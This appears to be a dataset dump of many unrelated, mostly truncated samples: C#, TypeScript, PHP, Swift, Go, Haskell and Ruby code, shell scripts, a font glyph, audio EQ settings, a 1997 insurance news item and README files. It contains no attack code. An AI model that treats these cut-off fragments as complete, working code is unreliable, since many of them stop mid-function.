0.2f,\n\t\trunSpeed = 1.0f,\n\t\t\t// Walk and run speed dictate at which rigidbody velocity, the animation should blend\n\t\trotationSpeed = 6.0f,\n\t\t\t// The speed at which the lower body should rotate\n\t\tshuffleSpeed = 7.0f,\n\t\t\t// The speed at which the character shuffles his feet back into place after an on-the-spot rotation\n\t\trunningLandingFactor = 0.2f;\n\t\t\t// Reduces the duration of the landing animation when the rigidbody has hoizontal movement\n\t\n\t\n\tprivate ThirdPersonController controller;\n\tprivate CharacterState state = CharacterState.Falling;\n\tprivate bool canLand = true;\n\tprivate float currentRotation;\n\tprivate Vector3 lastRootForward;\n\t\n\t\n\tprivate Vector3 HorizontalMovement\n\t{\n\t\tget\n\t\t{\n\t\t\treturn new Vector3 (rigidbody.velocity.x, 0.0f, rigidbody.velocity.z);\n\t\t}\n\t}\n\t\n\t\n\tvoid Reset ()\n\t// Run setup on component attach, so it is visually more clear which references are used\n\t{\n\t\tSetup ();\n\t}\n\t\n\t\n\tvoid Setup ()\n\t// If target or rigidbody are not set, try using fallbacks\n\t{\n\t\tif (target" +"declare module jCafe {\n \n export interface ParticipantAudio {\n /** Connection state of this participant's audio */\n state: Property<CallConnectionState>;\n\n /** Set this property to mute/unmute this participant (local or remote) */\n isMuted: Property<boolean>;\n\n /** \n * For the local participant set this property to hold/resume the call;\n * for a remote participant this property is read-only and is true when\n * the remote participant is holding the call. \n */\n isOnHold: Property<boolean>;\n\n /** True if there is audible sound in the channel */\n isSpeaking: Property<boolean>;\n \n /**\n * Defines the endpoint where the participant is being reached\n * To reach participant on Skype network and have Skype to Skype audio, \n * set it to corresponding person.id - this is default value\n * To reach participant on phone network and have Skype to PSTN audiocall, \n * set it to corresponding person.phoneNumbers[].telUri\n */\n endpoint: Property<string>;\n }\n}" +"<?php\n\nnamespace Core;\n\n/**\n * View\n *\n * PHP version 7.0\n */\nclass View\n{\n\n /**\n * Render a view file\n *\n * @param string $view The view file\n * @param array $args Associative array of data to display in the view (optional)\n *\n * @return void\n */\n public static function render($view, $args = [])\n {\n extract($args, EXTR_SKIP);\n\n $file = dirname(__DIR__) . \"/App/Views/$view\"; // relative to Core directory\n\n if (is_readable($file)) {\n require $file;\n } else {\n throw new \\Exception(\"$file not found\");\n }\n }\n\n /**\n * Render a view template using Twig\n *\n * @param string $template The template file\n * @param array $args Associative array of data to display in the view (optional)\n *\n * @return void\n */\n public static function renderTemplate($template, $args = [])\n {\n static $twig = null;\n\n if ($twig === null) {\n $loader = new \\Twig\\Loader\\Filesystemloader(dirname(__DIR__) . '/App/Views');\n $twig = new \\Twig\\Environment($loader);\n }\n\n echo $twig->render($template, $args);\n }\n}" +"#!/usr/bin/with-contenv sh\n\n\n_mount_fail()\n{\n\techo mount of $iso_file to _mountpoint=$_mountpoint failed.\n\techo Did you set all the required docker run options / permissions ?\n\techo For more info please see:\n\techo https://github.com/dreamcat4/docker-images/tree/master/samba-iso\n\tsleep inf\n}\n\nif [ ! \"$samba_flags\" ]; then\n\techo Error: the docker environment variable \\$samba_flags is not set\n\techo we need to know the samba share details to setup, see dreamcat4/iso-samba\n\techo and then set docker run -e samba_flags accordingly\n\tsleep inf\nfi\n\niso_file=/iso\n\nif [ -f \"$iso_file\" ]; then\n\n\t_mountpoint=\"$(echo $samba_flags | sed -e 's/^.*-s //' -e 's/[^;]*;//' -e 's/;.*$//')\"\n\n\t# Mount iso\n\tmkdir -p $_mountpoint\n\tmount -o loop $iso_file $_mountpoint || _mount_fail\n\n\t# Launch samba\n\t/usr/bin/samba.sh $samba_flags\n\n\nelse\n\techo Cant find any iso file mounted as the file $iso_file\n\techo Did you mount it directly with docker run -v myfile.iso:/iso/myfile.iso ?\n\tsleep inf\nfi" +"7\n13\n10\n9\n7\n16\n4\n6\n8\n13\n11\n17\n7\n14\n13\n4\n10\n20\n9\n4\n9\n5\n19\n6\n4\n6\n9\n4\n11\n13\n13\n5\n14\n9\n13\n11\n9\n14\n7\n11\n5\n13\n12\n7\n7\n13\n9\n7\n9\n9\n6\n11\n9\n11\n16\n7\n17\n11\n13\n13\n9\n9\n11\n11\n11\n9\n9\n8\n9\n9\n13\n11\n11\n6\n8\n16\n16\n13\n9\n4\n6\n4\n18\n9\n8\n7\n7\n7\n11\n9\n10\n5\n5\n12\n2\n4\n5\n6\n11\n8\n9\n6\n11\n13\n20\n8\n19\n6\n13\n7\n13\n11\n11\n7\n7\n13\n16\n17\n15\n11\n13\n5\n11\n13\n18\n11\n11\n13\n19\n11\n18\n13\n19\n16\n15\n17\n7\n9\n17\n17\n8\n11\n6\n13\n9\n13\n15\n9\n15\n21\n13\n15\n15\n18\n7\n18\n11\n13\n20\n31\n10\n8\n28\n22\n9\n7\n15\n9\n7\n7\n27\n18\n42\n12\n15\n11\n13\n7\n15\n26\n20\n11\n15\n15\n13\n14\n11\n18\n11\n24\n9\n22\n21\n33\n32\n24\n18\n30\n34\n16" +"{-# LANGUAGE GADTs, RankNTypes #-}\n\n-- Test pattern bindings, existentials, and higher rank\n\nmodule T12427a where\n\ndata T where\n T1 :: a -> ((forall b. [b]->[b]) -> Int) -> T\n T2 :: ((forall b. [b]->[b]) -> Int) -> T\n\n-- Inference\n-- Worked in 7.10 (probably wrongly)\n-- Failed in 8.0.1\n-- Fails in 8.2 because v is polymorphic\n-- and the T1 pattern match binds existentials,\n-- and hence bumps levels\nh11 y = case y of T1 _ v -> v\n\n-- Worked in 7.10 (probably wrongly)\n-- Failed in 8.0.1\n-- Succeeds in 8.2 because the pattern match has\n-- no existentials, so it doesn't matter than\n-- v is polymorphic\nh12 y = case y of T2 v -> v\n\n-- Inference\n-- Same results as for h11 and h12 resp\nT1 _ x1 = undefined\nT2 x2 = undefined\n\n-- Works in all versions\nh2 :: T -> (forall b. [b] -> [b]) -> Int\nh2 y = case y of T1 _ v -> v\n\n-- Checking\n-- Fails in 7.10 (head exploded)\n-- Fails in 8.0.1 (ditto)\n-- Succeeds in 8.2\n-- Fails in 8.12 (simple subsumption)\nx3 :: (forall a. a->a) ->" +"//\n// SettingViewCell.swift\n// BeautifulApp\n//\n// Created by \u6881\u4ea6\u660e on 15/11/27.\n// Copyright \u00a9 2015\u5e74 xiaoming. All rights reserved.\n//\n\nimport UIKit\n\nclass SettingViewCell: UITableViewCell,Reusable {\n \n @IBOutlet weak var iconView: UIImageView!\n \n @IBOutlet weak var itemLabel: UILabel!\n static let SettingViewCellID = \"SettingViewCellID\"\n \n var data : NSDictionary! {\n willSet {\n self.data = newValue\n }\n \n didSet {\n self.iconView.image = UIImage(named: data.object(forKey: \"icon\") as! String)\n self.itemLabel.text = data.object(forKey: \"text\") as? String\n }\n }\n \n class func cellWithTableView(tableView : UITableView) -> SettingViewCell {\n var cell : SettingViewCell? = tableView.dequeueReusableCell()\n if cell == nil {\n cell = Bundle.main.loadNibNamed(\"SettingViewCell\", owner: nil, options: nil)?.first as! SettingViewCell?\n }\n\n return cell!\n }\n\n override func awakeFromNib() {\n super.awakeFromNib()\n \n }\n\n}" +"package org.kframework.kdoc\n\nimport org.kframework.attributes.Att\nimport org.kframework.definition.{Module, NonTerminal, RegexTerminal, Terminal}\nimport org.kframework.frontend.K\nimport org.kframework.frontend.Unapply._\n\n/**\n * Takes a K term with the grammar described by Module module, and unparses it to its latex representation.\n * For each term:\n * - when its production has latex attribute, it uses that attribute for unparsing\n * - otherwise, it unparses by concatenating the Production's items with the separator parameter as a separator\n * @param module\n * @param separator\n */\nclass KtoLatex(module: Module, separator: String = \" \") extends ((K) => String) {\n var x = 0\n def apply(k: K): String = k match {\n case KApply(l, children) =>\n val latexAtts = module.productionsFor(l).flatMap(_.att.get[String](Att.latex))\n val latex = latexAtts.size match {\n case 0 => // no latex annotation\n val possibleLatexes = module.productionsFor(l).map(_.items.foldLeft((Seq[String](), 1)) {\n case ((r, i), t: Terminal) => (r :+ t.value, i)\n case ((r, i), t: RegexTerminal) => (r :+ t.regex, i) //TODO: we probably want something better here\n case ((r, i), nt: NonTerminal) => (r :+ \"#\" + i, i + 1)\n }).map(_._1.mkString(separator))\n possibleLatexes.size match {\n case 0 => throw new AssertionError(\"Could not find a label for \" + l)\n case 1 => possibleLatexes.head\n case _ => throw new AssertionError(\"Too productions for klabel \"" +"//\n// Case.swift\n// RbSwift\n//\n// Created by draveness on 19/03/2017.\n// Copyright \u00a9 2017 draveness. All rights reserved.\n//\n\nimport Foundation\n\n// MARK: - Case\npublic extension String {\n /// Returns a copy of str with all uppercase letters replaced with their lowercase counterparts.\n ///\n /// \t\"Hello\".downcase\t\t#=> \"hello\"\n /// \t\"HellHEo\".downcase\t\t#=> \"hellheo\" \n ///\n var downcase: String {\n return self.lowercased()\n }\n \n /// Downcases the contents of the receiver\n ///\n /// var hello = \"Hello\"\n /// hello.downcased() #=> \"hello\"\n /// \thello #=> \"hello\"\n ///\n /// - Returns: Self\n @discardableResult\n mutating func downcased() -> String {\n self = downcase\n return self\n }\n \n /// Returns a copy of str with all lowercase letters replaced with their uppercase counterparts.\n ///\n /// \t\"Hello\".upcase #=> \"HELLO\"\n /// \t\"HellHEo\".upcase\t\t#=> \"HELLHEO\"\n ///\n var upcase: String {\n return self.uppercased()\n }\n \n /// Upcases the contents of the receiver\n ///\n /// var hello = \"Hello\"\n /// hello.upcased() #=> \"HELLO\"\n /// \thello #=> \"HELLO\"\n ///\n /// - Returns: Self\n @discardableResult\n mutating func upcased() -> String {\n self = upcase\n return self\n }\n \n /// Returns a copy of str with uppercase alphabetic characters converted to lowercase and lowercase characters converted to uppercase.\n ///\n /// \t\"HellHEo\".swapcase\t\t#=> \"hELLheO\"\n ///\n var swapcase:" +"\nvar name = process.argv[2];\nvar isCountTest = process.argv[3];\n\nvar getPromise = require('../test/getPromise');\nvar Promise = getPromise(name);\nvar testCount = require('./testCount');\n\n/**\n * The test will run 10 ^ 5 promises.\n * Each promise will resolve after 1ms.\n * When all tasks are done, print out how much time it takes.\n */\n\nvar ver = (function () {\n if (name.indexOf('yaku') > -1)\n return require('../package.json').version;\n else if (name === 'native')\n return process.version.slice(1);\n else\n return require('../node_modules/' + name + '/package.json').version;\n})();\n\nvar countDown = Math.pow(10, 5);\n\nfunction checkEnd () {\n if (--countDown) {\n return;\n }\n return logResult();\n}\n\nfunction logResult () {\n var resolutionTime = Date.now() - startResolution;\n var mem = process.memoryUsage();\n\n return console.log( // eslint-disable-line\n '| [' + name + '][]@' + ver\n + ' | ' + (isCountTest === 'on' ? testCount(name) : 'disabled')\n + ' | ' + getPromise.map[name].coverage\n + ' | ' + (initTime + resolutionTime) + 'ms'\n + ' / ' + (Math.floor(mem.rss / 1024 / 1024)) + 'MB'\n + ' | ' + getPromise.map[name].optionalHelper\n + ' | ' + getPromise.map[name].helper\n + ' | ' + getPromise.map[name].size + 'KB |'\n );\n}\n\nfunction resolver (resolve) {\n return setTimeout(resolve, 1);\n}\n\nfunction asyncTask () {\n return new Promise(resolver).then(checkEnd);\n}" +"# azure-iot-security-tpm.TpmSecurityClient Requirements\n\n## Overview\n`TpmSecurityClient` provides query operations for TPM entities and key manipulation operations for the device registration client.\n\n## Example usage\n\nvar securityClient = new tpmSecurity.TpmSecurityClient();\nvar provisioningClient = ProvisioningDeviceClient.create(provisioningHost, idScope, new provisioningTransport(), securityClient);\n\n### TpmSecurityClient(registrationId?: string, customTpm?: any) [constructor]\n\nThe `TpmSecurityClient` constructor initializes a new instance of a `TpmSecurityClient` object that is used to query TPM entities and perform key manipulation and setup.\n\n**SRS_NODE_TPM_SECURITY_CLIENT_06_001: [** The `registrationId` argument if present will be returned as the `registrationId` for subsequent calls to `getRegistrationId`. **]**\n\n**SRS_NODE_TPM_SECURITY_CLIENT_06_002: [** The `customTpm` argument, if present` will be used at the underlying TPM provider. Otherwise the TPM provider will the tss TPM client with a parameter of `false` for simulator use. **]**\n\n### getEndorsementKey(callback: (err: Error, endorsementKey: string) => void): void\n\nQueries and returns the public portion of the endorsement key in the TPM hardware.\n\n**SRS_NODE_TPM_SECURITY_CLIENT_06_006: [** The `getEndorsementKey` function shall query the TPM hardware and return the `endorsementKey` in the callback. **]**\n\n**SRS_NODE_TPM_SECURITY_CLIENT_06_017: [** If the endorsement key does NOT exist, a new key will be created. **]**\n\n**SRS_NODE_TPM_SECURITY_CLIENT_06_007: [** Any errors from interacting with the TPM hardware will cause a `SecurityDeviceError` to be returned in the `err` parameter of the callback." +"// Copyright (c) Microsoft Corporation.\n// Licensed under the MIT license.\n\n/**\n * Shorthand enum for common traceFlags values inside SpanContext\n */\nexport const enum TraceFlags {\n /** No flag set. */\n NONE = 0x0,\n /** Caller is collecting trace information. */\n SAMPLED = 0x1\n}\n\n/**\n * A light interface that tries to be structurally compatible with OpenTelemetry\n */\nexport interface SpanContext {\n /**\n * UUID of a trace.\n */\n traceId: string;\n /**\n * UUID of a Span.\n */\n spanId: string;\n /**\n * https://www.w3.org/TR/trace-context/#trace-flags\n */\n traceFlags: number;\n}\n\n/**\n * An interface that enables manual propagation of Spans\n */\nexport interface SpanOptions {\n /**\n * The SpanContext that refers to a parent span, if any.\n * A null value indicates that this should be a new root span,\n * rather than potentially detecting a span via a context manager.\n */\n parent?: SpanContext | null;\n /**\n * Attributes to set on the Span\n */\n attributes?: { [key: string]: unknown };\n}\n\n/**\n * Tracing options to set on an operation.\n */\nexport interface OperationTracingOptions {\n /**\n * OpenTelemetry SpanOptions used to create a span when tracing is enabled.\n */\n spanOptions?: SpanOptions;\n}" +"# data-scientist-roadmap\n\nI just found this data science skills roadmap, drew by [Swami Chandrasekaran](http://nirvacana.com/thoughts/becoming-a-data-scientist/) on his cool blog.\n\n****\n\n![roadmap-picture](http://nirvacana.com/thoughts/wp-content/uploads/2013/07/RoadToDataScientist1.png)\n\n****\n\nJobs linked to __data science__ are becoming __more and more popular__. A __bunch of tutorials__ could easily complete this roadmap, helping whoever wants to __start learning stuff about data science__.\n\nFor the moment, a lot is __got on wikipedia__ (except for codes, always handmade). Any help's thus welcome!\n\n## Rules\n\n* __Feel free to fork this repository and pull requests__.\n* Always comment your code.\n* Please respect topology for filenames.\n* There's one README for each directory.\n* Also, could be great to share useful links or ressources in README files." +"---\ntitle: \"Persistent Chat Machines Expander\"\nms.reviewer: \nms.author: v-lanac\nauthor: lanachin\nmanager: serdars\nms.date: 3/27/2015\naudience: ITPro\nms.topic: article\nf1.keywords:\n- CSH\nms.custom:\n- ms.lync.tb.PersistentChatMachinesExpander\nms.prod: skype-for-business-itpro\nlocalization_priority: Normal\nms.assetid: 15bc1c8f-71bd-4d66-bba1-cac0f2fe90bf\ndescription: \"You activate or deactivate a deployed Persistent Chat Server or Persistent Chat Server pool by using the servers or pools listed in Machine state settings. You select a server or pool in the list and click the Make active button to set a server or pool as active.\"\n---\n\n# Persistent Chat Machines Expander\n \nYou activate or deactivate a deployed Persistent Chat Server or Persistent Chat Server pool by using the servers or pools listed in **Machine state settings**. You select a server or pool in the list and click the **Make active** button to set a server or pool as active.\n \nYou set a deployed Persistent Chat Server or Persistent Chat Server pool to inactive by selecting the server or pool in the list and click **Make inactive**. At least one server must be set to active.\n \n **OK** Accepts and commits changes to the dialog.\n \n **Cancel** Discards changes and closes the dialog.\n \n **Help** Displays this help screen.\n \n## See also\n\n[Plan for Persistent Chat Server in Skype" +"from django.contrib import admin\nfrom django.utils.translation import ugettext_lazy as _\nfrom fluent_utils.dry.admin import MultiSiteAdminMixin\nfrom parler.admin import TranslatableAdmin\n\nfrom fluent_contents import appsettings\nfrom fluent_contents.admin import PlaceholderFieldAdmin\n\nfrom . import appsettings as sharedcontent_appsettings\nfrom .models import SharedContent\n\n\nclass SharedContentAdmin(MultiSiteAdminMixin, TranslatableAdmin, PlaceholderFieldAdmin):\n \"\"\"\n Admin screen for the shared content, displayed in the global Django admin.\n \"\"\"\n\n filter_site = appsettings.FLUENT_CONTENTS_FILTER_SITE_ID\n list_display = (\"title\", \"slug\")\n ordering = (\"slug\",)\n\n def get_prepopulated_fields(self, request, obj=None):\n # Needed instead of prepopulated_fields=.. for django-parler==0.9\n if obj is not None and obj.pk:\n # Avoid overwriting the slug when adding a new language.\n return {}\n else:\n return {\"slug\": (\"title\",)}\n\n fieldsets = (\n (None, {\"fields\": (\"title\", \"contents\")}),\n (_(\"Publication settings\"), {\"fields\": (\"slug\",), \"classes\": (\"collapse\",)}),\n )\n\n if sharedcontent_appsettings.FLUENT_SHARED_CONTENT_ENABLE_CROSS_SITE:\n fieldsets[1][1][\"fields\"] += (\"is_cross_site\",)\n\n\nadmin.site.register(SharedContent, SharedContentAdmin)" +"require 'csv'\n\nclass Districts\n\n # Generates a mapping of zip codes to districts.\n # This is done, in theory, just once after redistricting until the next one\n #\n # This mapping is generated by using our boundary services loaded ZCTAs,\n # and congressional districts. It looks up all ZCTAs in the system, then\n # checks each one to see which districts it intersects, and saves to CSV.\n\n # options:\n # zip: do a particular zip code\n\n def self.run(options = {})\n # failsafe, should be many less records than this\n maximum = 100000\n\n page = 1\n per_page = options[:per_page] ? options[:per_page].to_i : 100\n\n zip_count = 0\n\n dest = Environment.config['location']['zips']\n FileUtils.mkdir_p File.dirname(dest)\n if File.exists?(dest)\n \tFileUtils.rm dest\n end\n\n # Zip.delete_all\n\n errors = []\n\n CSV.open(dest, \"w\") do |csv|\n while page < (maximum / per_page)\n puts \"Fetching page #{page}...\"\n\n if options[:zip]\n zips = [options[:zip]]\n else\n zips = zips_for page, per_page, options\n\n if zips.nil?\n Report.failure self, \"Failure paging through zips on page #{page}, aborting\"\n return\n end\n end\n\n zips.each do |zip|\n puts \"[#{zip}] Finding districts...\"\n\n districts = districts_for zip, options\n if districts.nil?\n errors << {zip: zip, message: \"Couldn't load districts intersecting this zip\"}\n next\n end\n\n districts.each do |district|\n csv << [zip, district[:state], district[:district]]\n end\n\n # cache in" +"import { execDirectoryFiles } from \"@/connector/directory-files\"\nimport { colorizeFile } from \"@/fzf/syntax/colorize\"\nimport { filePreviewCommand } from \"@/fzf/util\"\nimport type { FzfCommandDefinitionDefaultOption, FzfCommandDynamicOption, Resource, SourceFuncArgs } from \"@/type\"\n\n// eslint-disable-next-line @typescript-eslint/require-await\nexport const directoryFiles = async ({ args }: SourceFuncArgs): Promise<Resource> => {\n const arg = args[0] != null ? args[0] : \"\"\n const lines = (await execDirectoryFiles(arg)).filter((file) => file !== \"\" && !file.includes(\" \"))\n const options: FzfCommandDynamicOption | undefined = arg ? { \"--header\": `\"[Directory] ${arg}\"` } : undefined\n\n return {\n type: \"json\",\n lines: lines.map((line) => ({\n data: {\n command: \"FzfPreviewDirectoryFiles\",\n type: \"file\",\n file: line,\n },\n displayText: colorizeFile(line),\n })),\n options,\n }\n}\n\nexport const directoryFilesDefaultOptions = (): FzfCommandDefinitionDefaultOption => ({\n \"--prompt\": '\"DirectoryFiles> \"',\n \"--multi\": true,\n \"--preview\": filePreviewCommand(),\n})" +"/**\n * A Lexical analyser\n * @module lexer\n */\n\n/**\n * The base Token class. Contains the token type,\n * the raw string of the token, and the offset into the input line.\n */\nexport interface Token {\n type: string;\n raw: string;\n offset: number;\n}\n\n/**\n * A Lexical rule for a terminal. Consists of a RegExp and an action.\n */\nexport interface Rule {\n name: string,\n r: RegExp;\n fn: (Lexer, RegExpExecArray) => any\n}\n\n/**\n * A Lexer instance, parsing a given file. Usually you should use a LexicalGrammar to\n * create one of these.\n *\n * @class\n * @param {string} source the source code to parse\n * @param rules the rules of this lexer.\n */\n\nexport class Lexer {\n position: number = 0;\n constructor(public source: string, public rules: Rule[], private maxLength) {\n }\n\n /** Returns the next token in this lexer, or null if at the end. If the match fails, throws an Error. */\n scan(): Token {\n let token = null,\n length = 0;\n if (this.position < this.source.length) {\n if (this.source !== undefined && this.source.length < this.maxLength) {\n // TODO: Consider using vscode setting for tokenisation max length\n this.rules.forEach(rule => {\n rule.r.lastIndex = this.position;\n const x =" +"// WIP is a not-for-profit application. All revenue from the \"pro\" plan is\n// donated, see \"About WIP\" in the README.md file.\n//\n// If you cannot pay for the \"pro\" plan but need the additional features, add\n// your user or organization account with a comment explanation.\n\nmodule.exports = [\n 'resistbot', // 2018-10-23: Volunteer run org, helping people engage in their democracy\n 'urbanengine', // 2019-03-29: non-profit organization helping startups & small businesses network and grow within their community\n 'moonsmile', // 2019-9-1: Student writing tools to learn, I promise i will pay when I finish my project.\n 'apache', // 2020-01-01: non-profit corporation to support Apache software projects\n 'acts-project' // 2020-03-30: Generic track reconstruction framework for high energy physics\n]" +"StartChar: exclamdown\nEncoding: 161 161 40\nWidth: 275\nVWidth: 0\nFlags: HMW\nLayerCount: 3\nFore\nSplineSet\n125 374 m 24\n 92 374 65 401 65 434 c 24\n 65 467 92 494 125 494 c 24\n 158 494 185 467 185 434 c 24\n 185 401 158 374 125 374 c 24\n126 -180 m 0\n 90 -180 74 -145 74 -106 c 0\n 74 -43 87 87 97 205 c 0\n 99 234 110 263 125 263 c 0\n 135 263 145 233 147 211 c 0\n 159 95 174 -21 174 -108 c 0\n 174 -144 159 -180 126 -180 c 0\nEndSplineSet\nEndChar" +"//\n// Copyright (c) 2014-2015 Apple Inc. All rights reserved.\n//\n\n#import <XCTest/XCTestDefines.h>\n#import <XCTest/XCUIElement.h>\n\nNS_ASSUME_NONNULL_BEGIN\n\n#if XCT_UI_TESTING_AVAILABLE\n\nNS_CLASS_AVAILABLE(10_11, 9_0)\n\n/*! Proxy for an application. The information identifying the application is specified in the Xcode target settings as the \"Target Application\". */\n@interface XCUIApplication : XCUIElement\n\n/*!\n * Launches the application. This call is synchronous and when it returns the application is launched\n * and ready to handle user events. Any failure in the launch sequence is reported as a test failure\n * and halts the test at this point. If the application is already running, this call will first\n * terminate the existing instance to ensure clean state of the launched instance.\n */\n- (void)launch;\n\n/*!\n * Terminates any running instance of the application. If the application has an existing debug session\n * via Xcode, the termination is implemented as a halt via that debug connection. Otherwise, a SIGKILL\n * is sent to the process.\n */\n- (void)terminate;\n\n/*!\n * The arguments that will be passed to the application on launch. If not modified, these are the\n * arguments that Xcode will pass on launch. Those arguments can be changed, added to, or removed.\n * Unlike NSTask, it is" +"\"\nThis property represents exceptions that occured during other properties computation. This way tools can work witout interuptions, but users will be aware the there were some exceptions.\n\"\nClass {\n\t#name : #ReExceptionProperty,\n\t#superclass : #ReProperty,\n\t#instVars : [\n\t\t'stack',\n\t\t'message'\n\t],\n\t#category : #'Renraku-Critiques'\n}\n\n{ #category : #'instance creation' }\nReExceptionProperty class >> for: anEntity with: anException [\n\t\n\t^ self new\n\t\tinitializeSourceAnchor: (\n\t\t\tReSourceAnchor entity: anEntity);\n\t\tstack: anException signalerContext copyStack;\n\t\tmessage: anException description;\n\t\tyourself\n\t\t\n]\n\n{ #category : #actions }\nReExceptionProperty >> actions [\n\n\t^ { (RePropertyAction new\n\t\t icon: (self iconNamed: #smallDebug);\n\t\t description: 'Debug the exception';\n\t\t action: [ :prop | \n\t\t\t (OupsDebugRequest newForContext: prop stack)\n\t\t\t\t label: prop message;\n\t\t\t\t submit ];\n\t\t yourself) }\n]\n\n{ #category : #accessing }\nReExceptionProperty >> icon [\n\t^ self iconNamed: #exceptionIcon\n]\n\n{ #category : #accessing }\nReExceptionProperty >> message [\n\t^ message\n]\n\n{ #category : #accessing }\nReExceptionProperty >> message: anObject [\n\tmessage := anObject\n]\n\n{ #category : #accessing }\nReExceptionProperty >> stack [\n\t^ stack\n]\n\n{ #category : #accessing }\nReExceptionProperty >> stack: anObject [\n\tstack := anObject\n]\n\n{ #category : #accessing }\nReExceptionProperty >> title [\n\t^ '~Exception: [', message, ']'\n]" +"## giving back to the open source community\n\n### requirements\n\nFor this assignment, you must give something back to the open source community.\nThere are two ways you can do this: create your own project, or add documentation to an existing project.\n\n#### your own project\n\nIf you have an idea you want to develop, now's your chance!\nIt can be about anything you want.\nI'll help you spiffy it up and distribute it to the open source community.\n\nHere's some projects previous cs100 students have created:\n\n* Henry Garcia and Daniel Ramirez created [the git game](https://github.com/hgarc014/git-game): a game to help people learn git commands; this was really popular, and I think a sequel covering some more advanced features of git would be a huge success\n\n* Jamal Moon created [PacVim](https://github.com/jmoon018/PacVim): a game to help people learn vim commands\n\n* Thomas Liu and Adam Chao created [regexProgram](https://github.com/Liniarc/regexProgram): a tutorial to help students learn regular expression programming\n\n* Rica Feng and Stanley Cohen's [Melody Matcher](https://github.com/MiaoXiao/Melody-Matcher): a game for improving your tone recognition\n\n#### adding documentation\n\nOne common problem with open source software is a lack of documentation and easily accessible tutorials.\nYou will create some.\nFuture students of this class (and" +"#!/bin/bash\n#\n# This script runs all tests for the root CDK project, as well as any microservices, Lambda functions, or dependency \n# source code packages. These include unit tests, integration tests, and snapshot tests.\n# \n# This script is called by the ../initialize-repo.sh file and the buildspec.yml file. It is important that this script \n# be tested and validated to ensure that all available test fixtures are run.\n#\n# The if/then blocks are for error handling. They will cause the script to stop executing if an error is thrown from the\n# node process running the test case(s). Removing them or not using them for additional calls with result in the \n# script continuing to execute despite an error being thrown.\n\n# Save the current working directory\nsource_dir=$PWD\n\n# Test the CDK project\nnpm install\nnpm run test\nif [ \"$?\" = \"1\" ]; then\n\techo \"(source/run-all-tests.sh) ERROR: there is likely output above.\" 1>&2\n\texit 1\nfi\n\n# Return to the source/ level\ncd $source_dir" +"//\n// FuseUtilities.swift\n// Pods\n//\n// Created by Kirollos Risk on 5/2/17.\n//\n//\n\nimport Foundation\n\nclass FuseUtilities {\n /// Computes the score for a match with `e` errors and `x` location.\n ///\n /// - Parameter pattern: Pattern being sought.\n /// - Parameter e: Number of errors in match.\n /// - Parameter x: Location of match.\n /// - Parameter loc: Expected location of match.\n /// - Parameter scoreTextLength: Coerced version of text's length.\n /// - Returns: Overall score for match (0.0 = good, 1.0 = bad).\n static func calculateScore(_ pattern: String, e: Int, x: Int, loc: Int, distance: Int) -> Double {\n return calculateScore(pattern.count, e: e, x: x, loc: loc, distance: distance)\n }\n\n /// Computes the score for a match with `e` errors and `x` location.\n ///\n /// - Parameter patternLength: Length of pattern being sought.\n /// - Parameter e: Number of errors in match.\n /// - Parameter x: Location of match.\n /// - Parameter loc: Expected location of match.\n /// - Parameter scoreTextLength: Coerced version of text's length.\n /// - Returns: Overall score for match (0.0 = good, 1.0 = bad).\n static func calculateScore(_ patternLength: Int, e: Int, x: Int, loc: Int, distance: Int) -> Double {\n let" +"Filter 1: ON PK Fc 33 Hz Gain 6.6 dB Q 0.55\nFilter 2: ON PK Fc 2637 Hz Gain -6.7 dB Q 1.22\nFilter 3: ON PK Fc 5899 Hz Gain 3.6 dB Q 3.17\nFilter 4: ON PK Fc 7492 Hz Gain -6.4 dB Q 5.60\nFilter 5: ON PK Fc 11842 Hz Gain 7.0 dB Q 0.59\nFilter 6: ON PK Fc 58 Hz Gain 1.7 dB Q 5.64\nFilter 7: ON PK Fc 593 Hz Gain 2.1 dB Q 1.45\nFilter 8: ON PK Fc 3371 Hz Gain 1.6 dB Q 5.23\nFilter 9: ON PK Fc 3966 Hz Gain -2.9 dB Q 6.33\nFilter 10: ON PK Fc 12034 Hz Gain -0.7 dB Q 4.11" +"Britain's Britannic Assurance declared on Tuesday a 209 million pound ($336 million) special bonus for life insurance policies, following discussions with the government on ownership of surplus insurance funds.\r\nThe payout will apply to all \"with profits\" policies in force on February 17, 1997. Details will be given with the 1996 bonus due to be announced next month.\r\nThe company said last year it discussing with the Department of Trade and Industry (DTI) ownership of long-term assets, and a way to distribute the surplus to policyholders and shareholders.\r\nBritannic has now agreed with the DTI that 902 million pounds of the excess assets within the long term fund can be attributable to shareholders.\r\nBritannic also said it intended to increase its dividend for the year by 82 percent to 23 pence per share following an increase in life profits. This would be the basis for continuing the company's progressive dividend policy.\r\nThe news boosted Britannic shares, which jumped 71 pence, or nearly nine percent, at one stage before settling for a rise of 29 pence at 832.5.\r\nThe money attributable to shareholders forms part of total assets in the life funds which amounted to 5.682 billion pounds at the end" +"package weightpool\n\nimport (\n\t\"sync\"\n\n\t\"github.com/go-chassis/go-chassis/core/common\"\n\t\"github.com/go-chassis/go-chassis/core/config\"\n)\n\nvar weightPool *SafePool\nvar once sync.Once\n\nfunc init() { once.Do(func() { weightPool = &SafePool{pool: map[string]*Pool{}} }) }\n\n// GetPool returns singleton of weightPool\nfunc GetPool() *SafePool { return weightPool }\n\n// SafePool is a cache for pool of all destination\ntype SafePool struct {\n\tsync.RWMutex\n\tpool map[string]*Pool\n}\n\n// Get returns specific pool for key\nfunc (s *SafePool) Get(key string) (*Pool, bool) {\n\ts.RLock()\n\tvalue, ok := s.pool[key]\n\ts.RUnlock()\n\treturn value, ok\n}\n\n// Set can set pool to safe cache\nfunc (s *SafePool) Set(key string, value *Pool) {\n\ts.Lock()\n\ts.pool[key] = value\n\ts.Unlock()\n}\n\n// Reset can delete pool for specific key\nfunc (s *SafePool) Reset(key string) {\n\ts.Lock()\n\tdelete(s.pool, key)\n\ts.Unlock()\n}\n\n/* Weighted Round-Robin Scheduling\nhttp://zh.linuxvirtualserver.org/node/37\n\nwhile (true) {\n i = (i + 1) mod n;\n if (i == 0) {\n cw = cw - gcd(S);\n if (cw <= 0) {\n cw = max(S);\n if (cw == 0)\n return NULL;\n }\n }\n if (W(Si) >= cw)\n return Si;\n}*/\n\n// Pool defines sets of weighted tags\ntype Pool struct {\n\ttags []config.RouteTag\n\n\tmu sync.RWMutex\n\tgcd int\n\tmax int\n\ti int\n\tcw int\n\tnum int\n}\n\n// NewPool returns pool" +"# frozen_string_literal: true\n\nmodule Gitlab\n class VersionInfo\n include Comparable\n\n attr_reader :major, :minor, :patch\n\n def self.parse(str)\n if str && m = str.match(/(\\d+)\\.(\\d+)\\.(\\d+)/)\n VersionInfo.new(m[1].to_i, m[2].to_i, m[3].to_i)\n else\n 